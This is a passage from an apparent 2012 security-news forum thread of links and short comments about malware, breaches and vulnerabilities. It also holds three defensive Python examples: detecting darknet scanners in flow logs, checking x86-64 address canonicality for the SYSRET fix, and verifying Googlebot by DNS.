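    return timestamp, ipaddress.ip_address(src), ipaddress.ip_address(dst), service


def detect_scanners(lines, threshold=3):
    """Return {source: sorted darknet targets} for sources that touched >= threshold unused addresses."""
    darknet_targets = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        _, src, dst, _ = parse_flow(line)
        if is_darknet(dst):
            darknet_targets[src].add(dst)
    return {str(src): [str(d) for d in sorted(targets)]
            for src, targets in darknet_targets.items() if len(targets) >= threshold}


# Constructed flow log: normal traffic between live hosts, one stray lookup by 10.1.0.10,
# and 10.1.0.50 sweeping the subnet on tcp/445 the way a self-propagating worm would.
SAMPLE_FLOWS = """\
2012-06-13T10:00:01 10.1.0.10 -> 10.1.0.11 tcp/445
2012-06-13T10:00:02 10.1.0.10 -> 10.1.0.1 tcp/80
2012-06-13T10:00:02 10.1.0.10 -> 10.1.0.20 tcp/80
2012-06-13T10:00:03 10.1.0.50 -> 10.1.0.2 tcp/445
2012-06-13T10:00:03 10.1.0.50 -> 10.1.0.3 tcp/445
2012-06-13T10:00:03 10.1.0.50 -> 10.1.0.4 tcp/445
2012-06-13T10:00:04 10.1.0.50 -> 10.1.0.5 tcp/445
2012-06-13T10:00:04 10.1.0.50 -> 10.1.0.10 tcp/445
2012-06-13T10:00:04 10.1.0.50 -> 10.1.0.255 udp/137
"""

if __name__ == "__main__":
    for src, targets in detect_scanners(SAMPLE_FLOWS.splitlines()).items():
        print("possible scanner %s probed %d unused addresses: %s"
              % (src, len(targets), ", ".join(targets)))
```

The broadcast and network addresses are deliberately left out of the darknet set, since NetBIOS, DHCP and similar chatter legitimately hits them; a single stray hit (the 10.1.0.20 lookup) stays under the threshold so a mistyped address does not raise an alert. In production the live-host list has to come from DHCP leases or an asset inventory and be refreshed, otherwise every newly provisioned machine looks like a scanner's target.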
-
***
Intel Chips Prone to Hacks – 64-bit OSs Deemed Vulnerable
Intel CPUs are prone to hacker attacks after a vulnerability in the way they implement the SYSRET instruction was discovered in their x86-64 extension.
The vulnerability could allow hackers to execute code with kernel privileges while in a non-administrator account, or to gain control of a host operating system after escaping a virtual machine. The U.S. Computer Emergency Readiness Team (US-CERT) issued a security advisory in which it thoroughly details the vulnerability. Several x64-based operating systems like Windows 7, Windows Server 2008 R2, 64-bit FreeBSD, 64-bit NetBSD, as well as systems that include the Xen hypervisor, are exposed to this vulnerability.
“AMD processors’ SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon,” said AMD. “Therefore, this privilege escalation exposure is not applicable to any AMD processor.”
http://www.hotforsecurity.com/blog/intel-chips-prone-to-hacks-64-bit-oss-deemed-vulnerable-2377.html
***
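The whole SYSRET problem comes down to one property of an x86-64 address: it must be "canonical", meaning the upper unused bits are a sign extension of the highest implemented bit (bit 47 with 48-bit virtual addresses). On Intel parts SYSRET raises #GP for a non-canonical RCX while still at CPL0, after the kernel has already loaded the user's stack pointer, which is what the exploit rides on; the mitigation the affected vendors shipped is to use SYSRET only when the return address is canonical and fall back to IRET otherwise. The Python below is an added illustration of that check, not code from any kernel, from the article or from US-CERT; treating 48 bits as the default width is an assumption (57 applies with 5-level paging).

```python
# Width of the implemented virtual address space: 48 bits with 4-level paging (57 with 5-level).
VA_BITS = 48


def is_canonical(addr, va_bits=VA_BITS):
    """True when bits va_bits-1 .. 63 are all equal, i.e. the address sign-extends its low va_bits bits."""
    addr &= (1 << 64) - 1
    high = addr >> (va_bits - 1)                 # bits va_bits-1 .. 63: (64 - va_bits + 1) bits
    all_ones = (1 << (64 - va_bits + 1)) - 1
    return high == 0 or high == all_ones


def user_return_path(rip, va_bits=VA_BITS):
    """Kernel-exit decision: SYSRET only when the user RIP is canonical, otherwise fall back to IRET.

    IRET performs its own checks before the stack switch, so a bad RIP faults on the kernel
    stack instead of on an attacker-chosen one."""
    return "sysret" if is_canonical(rip, va_bits) else "iret"


def first_noncanonical(va_bits=VA_BITS):
    """Lowest non-canonical address: the first one past the end of the user half."""
    return 1 << (va_bits - 1)


if __name__ == "__main__":
    for rip in (0x00007FFFF7A00000, first_noncanonical(), 0xFFFF800000000000, 0xFFFF7FFFFFFFFFFF):
        print("%#018x canonical=%-5s path=%s" % (rip, is_canonical(rip), user_return_path(rip)))
```

The boundary cases are the ones that matter: 0x00007fffffffffff is the last canonical user address, 0x0000800000000000 is the first address the check must reject, and 0xffff800000000000 is canonical again because the upper bits are all ones. A user process can put any value it likes in RCX via a crafted return address, so the kernel has to apply the check on every exit path that ends in SYSRET, not just the common one.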
-
CharleyO, is there a particular reason for the monster sized text ?
Those who need larger text can always Ctrl and + key to increase the size.
-
Firefox 'new tab' feature exposes users' secured info: Fix promised
http://www.theregister.co.uk/2012/06/22/firefox_new_tab_security_concerns/
-
WordPress modules holed by Uploadify
http://www.h-online.com/security/news/item/WordPress-modules-holed-by-Uploadify-1626030.html
-
Russian botnet operators infected 6 million computers (http://www.h-online.com/security/news/item/Russian-botnet-operators-infected-6-million-computers-1624906.html)
-
***
10 Security Bugs You Should Be Watching
New malware continues to arrive on the scene every day, marking an ongoing test of wills and test of technologies that pits the good guys against the bad guys ......
Some of these threats are notable because of the scale of the attack. Others, such as in the case of Stuxnet and Flame, are notorious because of the types of technologies involved ......
Here is a list of current threats to keep tabs on.
http://www.crn.com/slide-shows/security/240002606/10-security-bugs-you-should-be-watching.htm?pgno=1
***
-
***
Older means wiser to computer security
A new Dimensional Research and ZoneAlarm report found that 18 – 25s are more confident in their security knowledge than 56 – 65s, but have experienced more security issues in the past two years compared to older users.
78% of 18 – 25s respondents do not follow security best practices, while cybercriminals are launching new and more sophisticated attacks on consumers. In comparison, 56 – 65s are more concerned about security and privacy and are twice as likely to protect their computers with additional security software.
Also, 67% of UK users reported security problems in the past two years – more than any other country in the study. 57% of users in Australia reported security problems, and 50% of users in the USA, Canada and Germany reported issues.
“Growing up in the digital age, 18 – 25s may appear to be a more tech-savvy generation, but that does not translate into safer computing and online practices,” said Tomer Teller, security evangelist and researcher at Check Point Software Technologies.
“Younger users tend to prioritize entertainment and community over security, perhaps due to overconfidence in their security knowledge. For example, they’re more concerned about gaming or other social activities than their online security. They also have less sophisticated security software, and hence, have reported more security problems than other groups.”
Read more at: http://www.net-security.org/secworld.php?id=13141
***
-
***
Apple Quietly Pulls Claims of Virus Immunity
In the wake of the Flashback botnet which targeted Mac computers, Apple has removed a statement from its messages on its website that Mac operating system X (OS X) isn't susceptible to viruses.
Apple removed the previous statement "It doesn't get PC viruses" and replaced it with "It's built to be safe," and "Safeguard your data. By doing nothing" with "Safety. Built in."
Read more at: http://www.pcworld.com/article/258183/apple_quietly_pulls_claims_of_virus_immunity.html
I have been saying for many years that Apple computers were not any safer than PCs, just less exploited from being less popular.
***
-
Thanks for posting CharleyO.
-
Researchers steal keys from RSA tokens
http://www.h-online.com/security/news/item/Researchers-steal-keys-from-RSA-tokens-1626358.html
RSA says that its tokens are secure
http://www.h-online.com/security/news/item/RSA-says-that-its-tokens-are-secure-1627326.html
-
***
Facebook Email Change Raises Security Concerns
Facebook’s decision to replace users’ chosen email addresses with their Facebook email address as the default on profile pages likely will make those @facebook.com addresses even more attractive to spammers and other cyber-criminals, according to one security expert.
Facebook has been quietly shifting the default addresses of its almost 900 million users from the email addresses they chose when signing up on the site—such as those from Yahoo or Google’s Gmail—to their Facebook addresses, which are the username@facebook.com. Facebook officials in April said they were giving all their users a Facebook email address using their public usernames, but it wasn’t until this past weekend that some journalists and blog sites noticed that Facebook was making these addresses the default addresses on public profiles.
The social network, which is notorious for making blanket changes to its Website operations without sufficiently notifying its users, has come under heavy criticism from users and outside observers alike since the move was publicized. The common theme is that it’s yet another attempt by Facebook to gain greater control over its users’ lives.
Read more at : http://www.eweek.com/c/a/Security/Facebook-Email-Change-Raises-Security-Concerns-436367/?kc=EWKNLEDP06282012D
***
-
Clear cutting of news from different brands.
http://www.securelist.com/en/analysis/204792235/XPAJ_Reversing_a_Windows_x64_Bootkit
http://www.securelist.com/en/blog/208193609/The_Day_The_Stuxnet_Died
http://www.securelist.com/en/blog/208193616/New_MacOS_X_backdoor_variant_used_in_APT_attacks#page_top (MacOS:MacKontrol-A)
http://news.drweb.com/show/?i=2508&lng=en&c=9
http://news.drweb.com/?i=2516&c=5&lng=en&p=0
-
Lottery Scammers Phishing with More Sophisticated Hooks (http://www.hotforsecurity.com/blog/lottery-scammers-phishing-with-more-sophisticated-hooks-2538.html?goback=%2Egde_1003727_member_129258404)
-
***
Android-Based Spam Attack: A Smartphone Botnet In Action?
A purported botnet is targeting Android-based smartphones as a means of delivering spam. The exploit leverages the Yahoo (NSDQ:YHOO) mail accounts of the phones’ owners, and it is believed by some to be the first time that malware authors have managed to assemble an army of Android phones for the delivery of spam.
This development was first reported on Tuesday by security blogger Terry Zink who wrote that the botnet is producing “the typical pump and dump variety that we’ve seen for years.”
In each case, the messages are reported to contain the message ID, "1341147286.19774.androidMobile@web140302.mail.bf1.yahoo.com," and acknowledge being sent from Yahoo Mail on Android, at the bottom of the dispatch.
Read more at :
http://www.crn.com/news/security/240003265/android-based-spam-attack-a-smartphone-botnet-in-action.htm?cid=nl_sec
***
-
***
Microsoft Patch Tuesday Likely To Target XML Bug, IE9 Vulnerabilities
This month, the advisory specifies a total of nine bulletins, three of which are listed as critical with the remaining six listed as important.
“I expect them to fix an XML problem that they identified last month," said Wolfgang Kandek, CTO of Qualys. “This is in response to a zero-day attack that is already being used in the wild. Last Patch Tuesday, they provided a workaround. And while we recommend that people use the workaround, I'm expecting a very real patch coming out on Tuesday.”
Read more at :
http://www.crn.com/news/security/240003246/microsoft-patch-tuesday-likely-to-target-xml-bug-ie9-vulnerabilities.htm?cid=nl_sec
***
-
First ever malware app found in Apple Store
http://www.dailymail.co.uk/news/article-2170169/First-malware-app-Apple-Store.html
-
Ransomware threatens to frame user and inform police
http://www.h-online.com/security/news/item/Ransomware-threatens-to-frame-user-and-inform-police-1632338.html
-
ZeroAccess: code injection chronicles
http://blog.eset.com/2012/06/25/zeroaccess-code-injection-chronicles
All Carberp botnet organizers arrested
http://www.eset.com/about/blog/blog/article/all-carberp-botnet-organizers-arrested/
Win32/Gataka: a banking Trojan ready to take off?
http://www.eset.com/about/blog/blog/article/win32gataka-a-banking-trojan-ready-to-take-off/
-
Hi Dim@rik,
On the same threat as you alert to: http://letsbytecode.com/security/zeus-is-not-visible-to-most-anti-viruses/ (link article posted by synt4x in letsbytecode - Security)
polonus
-
Report: Android malware doubled in just one month
http://www.h-online.com/security/news/item/Report-Android-malware-doubled-in-just-one-month-1632587.html
-
Report: Android malware doubled in just one month
http://www.h-online.com/security/news/item/Report-Android-malware-doubled-in-just-one-month-1632587.html
Fame, Fortune and, Infection. :(
-
Google Play Fails to Remove All Super Mario Malware
https://www.f-secure.com/weblog/archives/00002398.html
-
"A new #Android #Trojan that buys applications on behalf of users has been discovered on the China Mobile Marketplace.
Dubbed MMarketPay.A, the Trojan affects Chinese users subscribed to China Mobile, one of the world’s largest mobile phone carriers."
http://www.hotforsecurity.com/blog/100000-android-users-infected-with-application-buying-trojan-2706.html?goback=%2Egde_1003727_member_132561617
Has Avast's protection for the Android OS addressed this issue?
-
I just read this article. I never use gadgets or the sidebar but I know the functionality is enabled. It looks like it's time to get rid of them.
http://www.zdnet.com/security-flaws-signal-early-death-of-windows-gadgets-7000000724/
-
Malware sniffs for Windows, Mac OS X or Linux
http://www.h-online.com/security/news/item/Malware-sniffs-for-Windows-Mac-OS-X-or-Linux-1636577.html
-
Week 26 – Facebook’s week of evil
http://blogs.norman.com/2012/for-consumption/week-26-facebooks-week-of-evil
-
***
Windows, Linux, Mac OS X Hit by Cross-Platform Malware Attack
An attack has been discovered that serves up malware for all three platforms and opens up a backdoor on victimized systems.
Windows, Linux and Mac OS X are being targeted in a cross-platform malware attack, according to security experts.
Researchers at F-Secure spotted the attack on a Colombian transport site. The attack begins with a signed Java applet and a social engineering ploy in the form of a dialog box prompting the user to run an application despite its digital certificate not being verified.
Read more at :
http://www.eweek.com/c/a/Security/Windows-Linux-Mac-OS-X-Hit-by-CrossPlatform-Malware-Attack-566009/?kc=EWKNLEDP07132012B
***
-
Over 1 million user credentials compromised in Android Forums hack
http://www.h-online.com/security/news/item/Over-1-million-user-credentials-compromised-in-Android-Forums-hack-1640164.html
-
Over 1 million user credentials compromised in Android Forums hack
http://www.h-online.com/security/news/item/Over-1-million-user-credentials-compromised-in-Android-Forums-hack-1640164.html
Because of this, we always recommend do NOT use the SAME password in all sites you login... Steal from one, steal from all others...
-
***
Nvidia: 400,000 coded passwords may have been hit
U.S. semiconductor maker Nvidia Corp. says up to 400,000 users of its forums have had their encrypted passwords compromised in attacks dating back to early July.
It's the latest in a stream of data thefts which has hit major Internet companies over the past few weeks. Search provider Yahoo, networking sites LinkedIn and FormSpring, and dating site eHarmony have all recently reported breaches which collectively compromised the online credentials of millions of users.
Read more at :
http://my.earthlink.net/article/tec?guid=20120713/79521e47-db13-4745-a779-fddac9836d4d
***
-
***
Operation Tuleta makes sixth arrest in computer hacking investigation
A 55-year-old man has been arrested in Cardiff by police from Scotland Yard's Operation Tuleta investigation into computer hacking.
The man was arrested at his home on Friday morning on suspicion of offences under the Computer Misuse Act 1990 and the Regulation of Investigatory Powers Act (Ripa) 2000.
The man is the sixth person to be arrested under Operation Tuleta, which was launched in July last year as a splinter investigation to Scotland Yard's Operation Weeting probe into phone hacking.
The Met police said the man is in custody at a police station in the Cardiff area.
Operation Tuleta is investigating the use of so-called "trojan" emails which allow a hacker to take over a target's computer.
Read more at :
http://www.guardian.co.uk/technology/2012/jul/13/operation-tuleta-arrest-computer-hacking
***
-
***
Wi-fi hacking in Seattle cost businesses $3 million
Wireless computer hacking of identity theft and payroll thefts totalling more than $3 million dollars in Seattle has landed the last defendant in federal prison.
Joshuah Allen Witt, 35, was found guilty with two other defendants for hacking into 50 businesses' software using a wi-fi receiver that detects business wireless networks. They hacked into the security codes and accessed company computers, according to the Seattle Times online edition.
Read more at :
http://www.examiner.com/article/wi-fi-hacking-seattle-cost-businesses-3-million?cid=rss
***
-
Oracle Critical Patch Update Pre-Release Announcement - July 2012
http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
-
***
Microsoft Disables Windows Sidebar, Gadgets Due to Security Risk
The software company has released a security update that shuts off the desktop feature out of concerns that hackers could get into a user’s system.
Microsoft has issued a security advisory urging users to install an update that disables the Sidebar and Gadgets features on Windows Vista and Windows 7 operating systems due to a potential security vulnerability.
The security advisory warns that a hacker could get into a user’s system through an insecure Gadget running in Sidebar, execute arbitrary code and wreak havoc on the system. The Sidebar, as its name implies, is a section of the desktop real estate that lies to one side of the screen. Gadgets running in Sidebar are various tools, created with small amounts of code, which a user can see at a glance while working on their computer, such as a clock, the local temperature, a news headline feed or a stock ticker.
Read more at :
http://www.eweek.com/c/a/Security/Microsoft-Disables-Windows-Sidebar-Gadgets-Due-to-Security-Risk-643712/?kc=EWKNLEDP07162012B
***
-
Skype confirms privacy bug that sends IMs to unintended recipients
http://www.h-online.com/security/news/item/Skype-confirms-privacy-bug-that-sends-IMs-to-unintended-recipients-1643401.html
-
***
Worst Security Snafus of 2012 -- So Far
From the embarrassing hack of a conversation between the FBI and Scotland Yard to a plethora of data breaches, security snafus have ruled the first half of 2012. Here's a look at some of the worst snafus month-by-month.
Read more at :
http://www.pcworld.com/article/259258/a_look_at_the_worst_security_snafus_of_2012_so_far.html
***
-
World of Warcraft Scams, read more: http://blog.trendmicro.com/world-of-warcraft-scams-mist-of-pandaria-free-mounts-and-phishing-galore/
link article author: Menard Osena (Solutions Product Manager),
polonus
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
At least it will mean the end of Complity and Vshare malware
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
If you want to discuss this, please open a new topic. (Maybe in the ECC..)
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
If you want to discuss this, please open a new topic. (Maybe in the ECC..)
Oh come on, it was a simple question. A yes or no answer shouldn't be too hard.
-
New 'Madi' cyber-espionage campaign targets Iran AND Israel
Attackers 'fluent in Persian', say security sinkholers
http://www.theregister.co.uk/2012/07/17/madi_cyber_espionage_campaign/
-
Facebook again......
Fake Facebook photo tag ruse smears malware on PCs
http://www.theregister.co.uk/2012/07/19/facebook_photo_tag_malware_ruse/
-
Urgent security update for TeamViewer
http://www.h-online.com/security/news/item/Urgent-security-update-for-TeamViewer-1648586.html
-
New 'Madi' cyber-espionage campaign targets Iran AND Israel
Attackers 'fluent in Persian', say security sinkholers
http://www.theregister.co.uk/2012/07/17/madi_cyber_espionage_campaign/
more Madi
Iran: If the Madi cyber-strike was us it would've been another Stuxnet
http://www.theregister.co.uk/2012/07/20/madi_cyberspy_analysis/
-
Spam attack on Dropbox users
http://www.h-online.com/security/news/item/Spam-attack-on-Dropbox-users-1646660.html
-
Oracle Critical Patch Update Pre-Release Announcement - July 2012
http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
No patch for critical Oracle database vulnerability
http://www.h-online.com/security/news/item/No-patch-for-critical-Oracle-database-vulnerability-1649106.html
-
***
8 Million Email Addresses And Passwords Spilled From Gaming Site Gamigo Months After Hacker Breach
Call it a slow leak. Four months after the gaming site Gamigo warned users about a hacker intrusion that accessed some portions of its users’ credentials, more than 8 million usernames, emails and encrypted passwords from the site have been published on the Web, according to the data breach alert service PwnedList. The half-gigabyte collection of stolen user data was posted to the password-cracking forum Inside Pro earlier this month, where it remained online until late last week.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/07/23/eight-million-passwords-spilled-from-gaming-site-gamigo-months-after-breach/
***
-
***
Hacker Will Expose Potential Security Flaw In Four Million Hotel Room Keycard Locks
The next time you stay in a hotel room, run your fingers under the keycard lock outside your door. If you find a DC power port there, take note: With a few hacker tricks and a handful of cheap hardware, that tiny round hole might offer access to your room just as completely as your keycard.
At the Black Hat security conference Tuesday evening, a Mozilla software developer and 24-year old security researcher named Cody Brocious plans to present a pair of vulnerabilities he’s discovered in hotel room locks from the manufacturer Onity, whose devices are installed on the doors of between four and five million hotel rooms around the world according to the company’s figures. Using an open-source hardware gadget Brocious built for less than $50, he can insert a plug into that DC port and sometimes, albeit unreliably, open the lock in a matter of seconds. “I plug it in, power it up, and the lock opens,” he says simply.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/07/23/hacker-will-expose-potential-security-flaw-in-more-than-four-million-hotel-room-keycard-locks/
***
-
***
ATM Skimmers Get Wafer Thin
It’s getting harder to detect some of the newer ATM skimmers, fraud devices attached to or inserted into cash machines and designed to steal card and PIN data. Among the latest and most difficult-to-spot skimmer innovations is a wafer-thin card reading device that can be inserted directly into the ATM’s card acceptance slot.
See and read more at :
http://krebsonsecurity.com/2012/07/atm-skimmers-get-wafer-thin/
***
-
Hack Reveals Security Flaw with In-App Purchases
http://www.ign.com/articles/2012/07/14/hack-reveals-security-flaw-with-in-app-purchases
A hack has been found that enables free in-app purchases from the App Store on iOS devices.
-
***
Warning: Battery-saver app on Android is malware
A new piece of malware is trying to take advantage of poor battery life on Android smartphones. Cybercriminals have created an app that is supposed to reduce battery use, but in reality steals the user's contacts data stored on the device.
Android.Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location. The Trojan may arrive as a package with the following name: BatteryLong.apk.
See and read more at :
http://www.zdnet.com/warning-battery-saver-app-on-android-is-malware-7000001483/
***
-
***
Mom arrested for hacking school computers, tweaking her kids' grades
A US mother is facing six felony counts for allegedly hacking into her children's school computer, changing their grades, and accessing the school's human resources system to open thousands of personnel files that contained contracts, employee reports and other information.
Venusto is accused of changing her daughter's grade from an F to an M for "medical," of allegedly boosting her son's grade of 98 percent to 99 percent, and of using the superintendent's information to log onto the district email system and to access Northwestern Lehigh's human resources system.
Read more at :
http://nakedsecurity.sophos.com/2012/07/23/mom-hacking-school-grades/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
-
***
Hacker Will Expose Potential Security Flaw In Four Million Hotel Room Keycard Locks
The next time you stay in a hotel room, run your fingers under the keycard lock outside your door. If you find a DC power port there, take note: With a few hacker tricks and a handful of cheap hardware, that tiny round hole might offer access to your room just as completely as your keycard.
At the Black Hat security conference Tuesday evening, a Mozilla software developer and 24-year old security researcher named Cody Brocious plans to present a pair of vulnerabilities he’s discovered in hotel room locks from the manufacturer Onity, whose devices are installed on the doors of between four and five million hotel rooms around the world according to the company’s figures. Using an open-source hardware gadget Brocious built for less than $50, he can insert a plug into that DC port and sometimes, albeit unreliably, open the lock in a matter of seconds. “I plug it in, power it up, and the lock opens,” he says simply.
Sometimes you don't even have to go high-tech. A few years ago when they were doing major roofing work on our apartment building (we're on the top floor), the management moved us to a nearby hotel for the weekend. At one point I'd gone downstairs there (breakfast, maybe?), and because for some reason the room numbers didn't correspond with the floor they were on, coming back up I got off the elevator on the wrong floor.
My card opened "our" room just fine, and it was only when I didn't see any of our belongings that I realized my error. Fortunately the room was unoccupied -- I'm guessing the hotel left unbooked rooms unlocked for the convenience of cleaning and other staff.
-
Hi friends,
Be aware that this could become a real threat: http://community.websense.com/blogs/securitylabs/archive/2012/07/20/a-malware-very-social-and-ready-for-the-olympic-games.aspx (link post author = Gianluca Giuliani). Don't say we did not warn you to watch your clicks,
polonus
-
Keep your java up to date, go here to check: http://www.java.com/en/download/installed.jsp
Gigantic increase in java based malware recently.
See: http://blogs.technet.com/b/mmpc/archive/2012/07/25/how-to-protect-yourself-from-java-based-malware.aspx
(link article author = MS's Jeong Wook, Microsoft Malware Protection Center)
polonus
-
Keep your java up to date, go here to check: http://www.java.com/en/download/installed.jsp
Gigantic increase in java based malware recently.
See: http://blogs.technet.com/b/mmpc/archive/2012/07/25/how-to-protect-yourself-from-java-based-malware.aspx
(link article author = MS's Jeong Wook, Microsoft Malware Protection Center)
polonus
No Java here for a long time...!!
Funny thing is that most users don't even know that most of them don't need it at all... ;)
-
Hi Asyn,
What would help would be the extra click to allow it to run in a browser. I hope that will be brought in. Some browsers will keep it up to date for you, and the cases where you need the java functionality (specific scanners and applications) are becoming rare,
polonus
-
Spoofed google bots from non-google IPs trying to insert malcode, see: http://www.incapsula.com/the-incapsula-blog/item/369-was-that-really-a-google-bot-crawling-my-site (link article source incapsula) - validating the user agent and the IPs used is the advice the incapsula team gives,
polonus
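The verification the Incapsula advice above amounts to, as an added example (my code, not Incapsula's or the forum's): reverse-resolve the client IP, require the PTR name to sit under googlebot.com or google.com, then forward-resolve that name and confirm it maps back to the same IP. A user agent string alone proves nothing, since anyone can send one. The resolver functions are injectable, so the sample run below works offline against constructed DNS data using RFC 5737 documentation addresses; only the system_* helpers touch real DNS.

```python
"""Check whether a request claiming to be Googlebot really comes from Google.

Added example; the DNS records in FAKE_PTR / FAKE_A are constructed for the demo
and are not real Google records.
"""
import socket
from typing import Callable, Dict, List, Tuple

GOOGLE_CRAWLER_DOMAINS = ("googlebot.com", "google.com")


def system_reverse(ip: str) -> str:
    """PTR lookup through the OS resolver; raises socket.herror when no PTR exists."""
    return socket.gethostbyaddr(ip)[0]


def system_forward(host: str) -> List[str]:
    """A/AAAA lookup through the OS resolver, returning every address for the name."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _under_google_domain(host: str) -> bool:
    """True only for names equal to, or ending in '.', one of the crawler domains.
    A PTR such as 'googlebot.com.spoofed.example' must not pass."""
    host = host.rstrip(".").lower()
    return any(host == d or host.endswith("." + d) for d in GOOGLE_CRAWLER_DOMAINS)


def verify_googlebot(ip: str, user_agent: str,
                     reverse: Callable[[str], str] = system_reverse,
                     forward: Callable[[str], List[str]] = system_forward) -> Tuple[bool, str]:
    """Return (verified, reason). Only requests that claim to be Googlebot are checked."""
    if "googlebot" not in user_agent.lower():
        return False, "user agent does not claim to be Googlebot"
    try:
        ptr = reverse(ip)
    except (socket.herror, socket.gaierror, KeyError):
        return False, "no PTR record for %s" % ip
    if not _under_google_domain(ptr):
        return False, "PTR %s is not under a Google crawler domain" % ptr
    try:
        addrs = forward(ptr)
    except (socket.gaierror, KeyError):
        return False, "forward lookup of %s failed" % ptr
    # The PTR is under the attacker's control for their own address space, so the
    # forward lookup must agree before the claim is accepted.
    if ip not in addrs:
        return False, "forward lookup of %s does not return %s" % (ptr, ip)
    return True, "verified: %s <-> %s" % (ip, ptr)


# Constructed DNS data for the offline demo (documentation addresses, RFC 5737).
FAKE_PTR: Dict[str, str] = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com.",     # genuine-looking, consistent
    "198.51.100.7": "googlebot.com.spoofed.example",     # suffix trick in the PTR
    "203.0.113.5": "crawl-192-0-2-10.googlebot.com.",    # forged PTR, forward disagrees
}
FAKE_A: Dict[str, List[str]] = {
    "crawl-192-0-2-10.googlebot.com.": ["192.0.2.10"],
    "googlebot.com.spoofed.example": ["198.51.100.7"],
}


def fake_reverse(ip: str) -> str:
    if ip not in FAKE_PTR:
        raise socket.herror("no PTR")
    return FAKE_PTR[ip]


def fake_forward(host: str) -> List[str]:
    if host not in FAKE_A:
        raise socket.gaierror("no A record")
    return FAKE_A[host]


GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def check_sample_requests() -> Dict[str, bool]:
    """Run the four constructed clients through the check; only the first is genuine."""
    ips = ["192.0.2.10", "198.51.100.7", "203.0.113.5", "203.0.113.9"]
    return {ip: verify_googlebot(ip, GOOGLEBOT_UA, fake_reverse, fake_forward)[0] for ip in ips}


if __name__ == "__main__":
    for ip, ok in check_sample_requests().items():
        print(ip, "verified" if ok else "rejected")
```

In a web server you would run verify_googlebot only on requests whose user agent claims to be Googlebot (and cache the result per IP, since the two lookups are slow), then treat rejected claimants like any other unknown client rather than granting them crawler privileges.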
-
Hi Asyn,
What would help would be the extra click to allow it to run in a browser. I hope that will be brought in. Some browsers will keep it up to date for you, and the cases where you need the java functionality (specific scanners and applications) are becoming rare,
polonus
Firefox 14's new click-to-play feature does just that, requires the extra click to permit applets to load and run. I only need Java on one game site, and someone over at the MS forums was nice enough to show me how to grant ongoing permission on a per-site basis.
-
Hi MikeBCda,
Thanks for the feedback. It helps the discussion and informs us all. I appreciate that.
In GoogleChrome I have Better Pop Up Blocker installed that sort of gives me the same functionality, when you have to allow an applet to run.
And we need to be cautious as MS found up 96 leaks in third party software during the last twelve months, of which 63% has not been patched yet.
See: http://download.microsoft.com/download/B/D/B/BDB57917-D70B-41C3-9948-C5C0C67875D4/MSRC%20Progress%20Report%202012.pdf
(link source: MSVR)
pol
-
Keep a finger on the pulse: http://www.securitywizardry.com/radar.htm
polonus
-
Persistent router botnets on the horizon. Your router can be hacked and backdoored, device fingerprinting scripts for network devices via a webbrowser are already available, see: http://www.computerworld.com/s/article/9229775/Persistent_router_botnets_on_the_horizon_researcher_says_at_Defcon
IDG news service link article author = Lucian Constantin
polonus
-
Oi, missile boffins! Stop ogling web filth at work - Pentagon
http://www.theregister.co.uk/2012/08/02/smut_warning_missile_defense_agency/
;D
Pentagon top brass have ordered missile defence boffins to stop using government computers to surf for porn.
-
Facebook has more than 83 million illegitimate accounts
http://www.bbc.com/news/technology-19093078
-
I know of a country that seems to have that same problem with its citizens. :D
-
Adware Shifts Focus from Advertising to Data Harvesting (http://www.hotforsecurity.com/blog/adware-shifts-focus-from-advertising-to-data-harvesting-2942.html?goback=%2Egde_1003727_member_141915628)
-
Facebook has more than 83 million illegitimate accounts
http://www.bbc.com/news/technology-19093078
According to the Yahoo News version of the story, Facebook claims that the vast majority of the "illegitimate" accounts fall into two categories:
1) Members who forgot their password or other login ID and set up a new account to get back in. I won't go anywhere near FB, so don't know if they've got the usual "forgot my password" thing which would presumably avoid this.
2) Commercial (including non-profit) accounts which should have been set up as pages rather than accounts.
While they agree that in some cases an account might have been set up specifically for spamming/scams, they feel those are a very small percentage.
-
Google's anti-malware Bouncer too tolerant
http://www.h-online.com/security/news/item/Google-s-anti-malware-Bouncer-too-tolerant-1654441.html
-
Cloud service cracks VPN passwords in 24 hours
http://www.h-online.com/security/news/item/Cloud-service-cracks-VPN-passwords-in-24-hours-1656104.html
-
***
10 Olympics-Themed Phishing Scams To Avoid At All Costs
Every four years, the Olympics provide the opportunity for world-class athletes to raise their games just a little higher. But, the same is also true in the cyberworld. We've looked through a long list of warnings from the Olympic Committee and distilled a few of the ones we thought were not only intriguing but also specifically targeted at unsuspecting spectators.
Read more in the slide show at :
http://www.crn.com/slide-shows/security/240004790/10-olympics-themed-phishing-scams-to-avoid-at-all-costs.htm?pgno=1
***
-
***
DDoS Attacks Are Getting Bigger And Badder
Data from a DDoS security vendor suggests that distributed denial of service attacks are not only becoming more widespread, they are also becoming "larger" and more likely to target specific applications.
Read more at :
http://www.crn.com/news/security/240005051/ddos-attacks-are-getting-bigger-and-badder.htm?cid=nl_crn
***
-
Script Kiddies Posing as Hackers
http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/all/
What a story! Be sure to read the 'Comments'. Very illuminating. Scary.
